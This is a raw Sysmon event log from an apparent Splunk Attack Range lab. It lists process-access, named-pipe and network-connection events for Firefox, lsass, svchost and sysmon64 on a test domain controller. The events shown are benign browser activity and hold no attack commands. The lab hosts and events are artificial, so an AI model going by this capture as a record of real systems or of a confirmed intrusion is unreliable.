Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.308{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.307{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.297{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-5C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.297{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-5C:\Program Files\Mozilla Firefox\firefox.exe 18141800x800000000000000043829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.297{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-4C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.297{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-4C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000043827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.754{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63619- 354300x800000000000000043826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.654{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56345-false10.0.1.12-8000- 354300x800000000000000043825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.631{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56344-false72.21.91.29-80http 354300x800000000000000043824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.504{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56343-false35.161.176.217ec2-35-161-176-217.us-west-2.compute.amazonaws.com443https 23542300x800000000000000016747Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:00.150{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BDCD6B3F075CD68381684D5BEE713EE,SHA256=F007B6430AEEAB9D7D207FF7FA4D3868DAD74FD6B8CD7FD3B58362D0951C3D8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.279{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.278{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1d018|C:\Windows\System32\KERNEL32.DLL+25aa7|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.278{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.278{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.274{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.273{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.263{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.9981557776493447714C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.263{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.9981557776493447714C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.261{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.261{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.7.198582643C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.260{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.260{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.251{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.10618840319695492166C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.251{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.10618840319695492166C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.251{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.251{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.250{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.250{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.6.128658094C:\Program Files\Mozilla Firefox\firefox.exe 18141800x800000000000000043805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.247{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-3C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.247{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-3C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.234{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.234{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.229{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.225{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.15565474582902019495C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:23:00.225{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.15565474582902019495C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.224{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.224{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.5.175865267C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.222{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000043795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.222{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.219{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:23:00.219{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.218{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla 